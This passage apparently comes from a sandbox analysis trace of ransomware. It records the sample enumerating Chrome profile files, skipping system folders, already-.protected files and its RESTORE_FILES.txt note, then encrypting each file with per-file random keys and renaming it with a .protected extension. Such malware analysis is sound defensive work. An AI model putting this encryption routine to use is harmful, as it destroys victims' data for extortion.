hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 106 [0084.249] StrStrW (lpFirst="Origin Bound Certs-journal", lpSrch=".txt") returned 0x0 [0084.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 106 [0084.249] StrStrW (lpFirst="Origin Bound Certs-journal", lpSrch=".rar") returned 0x0 [0084.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 106 [0084.249] StrStrW (lpFirst="Origin Bound Certs-journal", lpSrch=".zip") returned 0x0 [0084.249] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.249] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.249] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.249] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.249] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.250] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.250] CloseHandle (hObject=0x154) returned 1 [0084.251] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal.protected") returned 116 [0084.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal.protected")) returned 1 [0084.251] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="Windows") returned -1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="Program Files") returned -1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="Program Files (x86)") returned -1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="$Recycle.bin") returned 1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="System Volume Information") returned -1 [0084.251] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Preferences") returned 91 [0084.251] StrStrIW (lpFirst="Preferences", lpSrch=".protected") returned 0x0 [0084.251] lstrcmpW (lpString1="Preferences", lpString2="RESTORE_FILES.txt") returned -1 [0084.251] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.251] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences") returned 91 [0084.252] StrStrW (lpFirst="Preferences", lpSrch=".txt") returned 0x0 [0084.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences") returned 91 [0084.252] StrStrW (lpFirst="Preferences", lpSrch=".rar") returned 0x0 [0084.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences") returned 91 [0084.252] StrStrW (lpFirst="Preferences", lpSrch=".zip") returned 0x0 [0084.252] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1a9d, lpOverlapped=0x0) returned 1 [0084.253] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffe563, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0084.253] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1a9d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1a9d, lpOverlapped=0x0) returned 1 [0084.254] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.254] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.254] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.254] CloseHandle (hObject=0x154) returned 1 [0084.254] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences.protected") returned 101 [0084.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences.protected")) returned 1 [0084.255] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.255] lstrcmpiW (lpString1="previews_opt_out.db", lpString2="Windows") returned -1 [0084.255] lstrcmpiW (lpString1="previews_opt_out.db", lpString2="Program Files") returned -1 [0084.255] lstrcmpiW 
(lpString1="previews_opt_out.db", lpString2="Program Files (x86)") returned -1 [0084.255] lstrcmpiW (lpString1="previews_opt_out.db", lpString2="$Recycle.bin") returned 1 [0084.255] lstrcmpiW (lpString1="previews_opt_out.db", lpString2="System Volume Information") returned -1 [0084.255] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned 99 [0084.255] StrStrIW (lpFirst="previews_opt_out.db", lpSrch=".protected") returned 0x0 [0084.255] lstrcmpW (lpString1="previews_opt_out.db", lpString2="RESTORE_FILES.txt") returned -1 [0084.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned 99 [0084.255] StrStrW (lpFirst="previews_opt_out.db", lpSrch=".txt") returned 0x0 [0084.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned 99 [0084.255] StrStrW (lpFirst="previews_opt_out.db", lpSrch=".rar") returned 0x0 [0084.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned 99 [0084.255] StrStrW (lpFirst="previews_opt_out.db", lpSrch=".zip") returned 0x0 [0084.255] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.262] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.262] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.263] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.263] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.263] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.263] CloseHandle (hObject=0x154) returned 1 [0084.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.protected") returned 109 [0084.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db.protected")) returned 1 [0084.264] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="Windows") returned -1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="Program Files") returned -1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="Program Files (x86)") returned -1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="$Recycle.bin") returned 1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="System Volume Information") returned -1 [0084.264] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned 107 [0084.264] StrStrIW (lpFirst="previews_opt_out.db-journal", lpSrch=".protected") returned 0x0 [0084.264] lstrcmpW (lpString1="previews_opt_out.db-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.264] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.265] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned 107 [0084.265] StrStrW (lpFirst="previews_opt_out.db-journal", lpSrch=".txt") returned 0x0 [0084.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned 107 [0084.265] StrStrW (lpFirst="previews_opt_out.db-journal", lpSrch=".rar") returned 0x0 [0084.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned 107 [0084.265] StrStrW (lpFirst="previews_opt_out.db-journal", lpSrch=".zip") returned 0x0 [0084.265] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.265] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.265] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.266] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.266] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.266] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | 
out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.267] CloseHandle (hObject=0x154) returned 1 [0084.267] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal.protected") returned 117 [0084.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal.protected")) returned 1 [0084.268] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="Windows") returned -1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="Program Files") returned 1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="Program Files (x86)") returned 1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="$Recycle.bin") returned 1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="System Volume Information") returned -1 [0084.268] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned 92 [0084.268] StrStrIW (lpFirst="QuotaManager", lpSrch=".protected") returned 0x0 [0084.268] lstrcmpW (lpString1="QuotaManager", lpString2="RESTORE_FILES.txt") returned -1 [0084.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: 
pbBuffer=0x295e4fc) returned 1 [0084.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned 92 [0084.268] StrStrW (lpFirst="QuotaManager", lpSrch=".txt") returned 0x0 [0084.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned 92 [0084.268] StrStrW (lpFirst="QuotaManager", lpSrch=".rar") returned 0x0 [0084.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned 92 [0084.268] StrStrW (lpFirst="QuotaManager", lpSrch=".zip") returned 0x0 [0084.268] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.288] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.288] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.289] SetFilePointerEx (in: hFile=0x154, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.289] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.289] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.289] CloseHandle (hObject=0x154) returned 1 [0084.290] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.protected") returned 102 [0084.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager.protected")) returned 1 [0084.290] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="Windows") returned -1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="Program Files") returned 1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="Program Files (x86)") returned 1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="$Recycle.bin") returned 1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="System Volume Information") returned -1 [0084.305] wnsprintfW (in: 
pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned 100 [0084.305] StrStrIW (lpFirst="QuotaManager-journal", lpSrch=".protected") returned 0x0 [0084.305] lstrcmpW (lpString1="QuotaManager-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.305] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.305] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned 100 [0084.306] StrStrW (lpFirst="QuotaManager-journal", lpSrch=".txt") returned 0x0 [0084.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned 100 [0084.306] StrStrW (lpFirst="QuotaManager-journal", lpSrch=".rar") returned 0x0 [0084.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned 100 [0084.306] StrStrW (lpFirst="QuotaManager-journal", lpSrch=".zip") returned 0x0 [0084.306] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: 
lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.306] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.306] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.307] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.307] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.307] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.307] CloseHandle (hObject=0x154) returned 1 [0084.308] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal.protected") returned 110 [0084.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 